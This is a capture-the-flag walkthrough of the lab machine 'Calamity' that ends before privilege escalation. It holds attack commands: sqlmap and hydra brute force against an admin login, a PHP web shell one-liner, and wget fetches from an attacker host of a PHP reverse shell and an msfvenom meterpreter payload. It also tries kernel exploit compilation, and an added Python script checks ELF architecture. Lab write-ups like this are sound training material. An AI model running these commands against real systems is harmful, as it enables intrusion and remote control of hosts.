Calamity (web RCE)

```bash
nikto -h 10.10.10.27
```

  • Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
  • OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
  • OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
  • OSVDB-3092: /admin.php: This might be interesting…

## Find an exploit

```bash
searchsploit EasyNews
```

http://10.10.10.27/admin.php

## Find the password

Burp + sqlmap. Capture the login POST in Burp and save it as `1.req`:

```http
POST /admin.php HTTP/1.1
Host: 10.10.10.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://10.10.10.27/admin.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Connection: close
Upgrade-Insecure-Requests: 1

user=00&pass=00
```


```bash
sqlmap -r 1.req
sqlmap -r 1.req --risk 3 --level 5
```

6. hydra

```bash
cd /usr/share/seclists/Usernames
hydra -L top-usernames-shortlist.txt -P /usr/share/wordlists/500-worst-passwords.txt -f 10.10.10.27 http-post-form "/admin.php:user=^USER^&pass=^PASS^:HERE"
```

`HERE` is a placeholder. The third field of hydra's `http-post-form` target is the condition string: by default (or with an `F=` prefix) it is text that appears only in the failed-login response, and with an `S=` prefix it is text that appears only on success. Without a real value there, hydra reports every attempt as a valid login. `-f` stops at the first pair found.


7. wapiti

```bash
wapiti -u http://10.10.10.27/admin.php
```

No vulnerabilities found.

8. Test whether a one-liner can be POSTed

```bash
# single quotes: inside double quotes the shell would expand $_GET to an empty string
curl -X POST http://10.10.10.27/admin.php -d '<?php system($_GET["cmd"]); ?>'
```

Response:

```
Password:
Username:
```

I was about to test whether a one-liner could be uploaded through POST when, unexpectedly, I found a password hidden in the page source.

![](3.PNG)

Note that in the screenshot the username and password are swapped. Capturing the request with Burp... em, it must be a developer mistake.

9. Spray the recovered password across username lists

```bash
cd /usr/share/seclists/Usernames
hydra -L top-usernames-shortlist.txt -p skoupidotenekes -f 10.10.10.27 http-post-form "/admin.php:user=^USER^&pass=^PASS^:HERE"
hydra -L cirt-default-usernames.txt -p skoupidotenekes -f 10.10.10.27 http-post-form "/admin.php:user=^USER^&pass=^PASS^:HERE"
```


![](4.PNG)

10. Command execution via http://10.10.10.27/admin.php?html=

```
html= admin.php bg.png index.html leet.png uploads
html= www-data
html=
html=
```

`/bin/nc` is `/bin/nc.openbsd`, which does not support `-e`, so upload a PHP reverse shell instead.

`ls -al /tmp`: the tmp directory is writable but not listable (it has no read bit, so `ls` on it fails, but files can still be created in it and opened by their exact name):

```
d-wx-wx-wx 10 root root 4096 Mar 19 23:39 tmp
```

```
pwd
/var/www/html
```

```
/usr/bin/wget http://10.10.14.7/php-reverse-shell.php -P /tmp
```

```
html=
chmod a+x /tmp/php-reverse-shell.php
html=
```

That gave a shell.


11. info

```
Linux calamity 4.4.0-81-generic #104-Ubuntu SMP Wed Jun 14 08:15:00 UTC 2017 i686 i686 i686 GNU/Linux
```

```bash
whereis gcc
gcc: /usr/bin/gcc /usr/lib/gcc /usr/share/man/man1/gcc.1.gz
```

Next, upload an msf-style payload. The kernel is i686, so the payload has to be 32-bit x86:

```bash
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=6678 -f elf -o payload.elf
```

Run locally (`handler` is an msfconsole command):

```bash
handler -H 10.10.14.7 -P 6678 -p linux/x86/meterpreter/reverse_tcp
python -m SimpleHTTPServer
```

Run in the remote shell:

```bash
wget http://10.10.14.7:8000/payload.elf -P /tmp
chmod a+x /tmp/payload.elf
/tmp/payload.elf
```

```
[*] Meterpreter session 5 opened (127.0.0.1 -> 127.0.0.1) at 2019-03-20 12:11:48 +0800
```

The session connects, but it is dropped as soon as it opens.


12. searchsploit linux 4.4.0

```bash
wget http://10.10.14.7:8000/43418.c -P /tmp
chmod a+x /tmp/43418.c
gcc 43418.c -o pwn
```

Compilation failed on the target.

```bash
wget http://10.10.14.7:8000/pwn -P /tmp
chmod a+x /tmp/pwn
./pwn
```

Wrong binary format: the copy compiled locally on Kali is 64-bit, and this i686 kernel cannot execute an x86-64 ELF.

```bash
wget http://10.10.14.7:8000/44298.c -P /tmp
gcc 44298.c -o pwn
44298.c
```

Compilation failed as well.


13. ps -ef | grep root

```
root 1049 1 0 Mar17 ? 00:00:01 /usr/bin/lxcfs /var/lib/lxcfs/
```

Looking up lxcfs (the FUSE daemon LXC uses to give containers their own view of /proc) suggested that this host may be a container.


14. cat /home/xalvas/dontforget.txt

```
peda keeps commads history in the working dir…you should make a dir in /tmp and work from there
keep in mind that tmp is not listable,so other users cannot see your files and folders (if you dont use extrmely simple names)
```


15. Found a writable directory, /var/tmp; upload LinEnum.sh to the target there

```bash
wget http://10.10.14.7:8000/LinEnum.sh
wget http://10.10.14.7:8000/linux-exploit-suggester.sh
chmod a+x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
```

```bash
wget http://10.10.14.7:8000/40839
gcc -pthread 40839 -o dirty -lcrypt
/usr/bin/ld:40839: file format not recognized; treating as linker script
/usr/bin/ld:40839:2: syntax error
collect2: error: ld returned 1 exit status
```

gcc decides the language from the file extension. Downloaded without its `.c` suffix, `40839` is not compiled at all but handed straight to the linker, which is where the "treating as linker script" error comes from. Saving it as `40839.c`, or compiling with `gcc -x c 40839 ...`, avoids that.
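Two of the failures above are avoidable with a check before uploading: in section 12 the `pwn` built on a 64-bit Kali would not run on the i686 target, and here `40839` went to the linker because it lacked a `.c` extension. The following Python script is an added example and not part of the original writeup. It decodes the ELF identification bytes and `e_machine` from a file header, compares them with the target's `uname -m`, and reports the extra gcc flags needed to build for that target. The two sample headers are constructed inline; the assumption that an x86_64 target runs 32-bit i386 binaries relies on IA-32 emulation being enabled, which is the Ubuntu default.

```python
import struct

# e_machine values from the ELF specification for the architectures compared here
EM_386, EM_ARM, EM_X86_64, EM_AARCH64 = 3, 40, 62, 183
EM_NAMES = {EM_386: "i386", EM_ARM: "arm", EM_X86_64: "x86_64", EM_AARCH64: "aarch64"}

# what `uname -m` reports on the target -> the e_machine its kernel executes natively
UNAME_TO_EM = {"i386": EM_386, "i486": EM_386, "i586": EM_386, "i686": EM_386,
               "x86_64": EM_X86_64, "armv7l": EM_ARM, "aarch64": EM_AARCH64}


def parse_elf_header(data):
    """Decode e_ident plus e_type/e_machine from the first 20 bytes of an ELF file."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("invalid EI_CLASS/EI_DATA")
    endian = "<" if ei_data == 1 else ">"          # EI_DATA decides how e_machine is stored
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "LSB" if ei_data == 1 else "MSB",
        "type": e_type,                             # 2 = ET_EXEC, 3 = ET_DYN (PIE)
        "machine": e_machine,
        "machine_name": EM_NAMES.get(e_machine, hex(e_machine)),
    }


def runs_on(header, uname_m):
    """True if a binary with this header executes on a target whose `uname -m` is uname_m."""
    native = UNAME_TO_EM.get(uname_m)
    if native is None:
        raise ValueError("unknown uname -m value: %r" % uname_m)
    if header["machine"] == native:
        return True
    # Assumption: an x86_64 kernel has IA-32 emulation enabled (Ubuntu default) and so
    # also runs i386 ELF32 binaries. The reverse never works, which is the writeup's failure.
    return uname_m == "x86_64" and header["machine"] == EM_386 and header["bits"] == 32


def check_file(path, uname_m):
    """Read the header from disk and compare it with the target architecture."""
    with open(path, "rb") as f:
        return runs_on(parse_elf_header(f.read(64)), uname_m)


def gcc_flags_for(uname_m, source):
    """Extra gcc flags (to put before the source file) when building on 64-bit Kali."""
    flags = []
    if UNAME_TO_EM.get(uname_m) == EM_386:
        flags.append("-m32")                        # needs the gcc-multilib package
    if not source.endswith(".c"):
        flags += ["-x", "c"]                        # a bare "40839" would go to the linker
    return flags


# Constructed sample headers: e_ident, e_type=ET_EXEC, e_machine, zero padding to full size
ELF32_I386 = b"\x7fELF\x01\x01\x01" + b"\x00" * 9 + struct.pack("<HH", 2, EM_386) + b"\x00" * 32
ELF64_X86_64 = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + struct.pack("<HH", 2, EM_X86_64) + b"\x00" * 44

if __name__ == "__main__":
    for name, blob in (("ELF32_I386", ELF32_I386), ("ELF64_X86_64", ELF64_X86_64)):
        hdr = parse_elf_header(blob)
        print(name, hdr["bits"], hdr["machine_name"], "runs on i686:", runs_on(hdr, "i686"))
    print("gcc flags for an i686 target, source 40839:", gcc_flags_for("i686", "40839"))
```

`check_file("pwn", "i686")` on the Kali side before the `wget` would have flagged the 64-bit build; `file pwn` shows the same fields, but the script version is the one to drop into an upload helper.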


16. Process protection

```
nc -lnvp 7788 < recov.wav
Listening on [0.0.0.0] (family 0, port 7788)
Killed

python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 …
Killed
```

Privilege escalation requires getting around the process protection and a number of memory-protection mechanisms, and exploiting a binary with a hand-written exploit.

I read the walkthrough and still could not follow it. Bailing out here.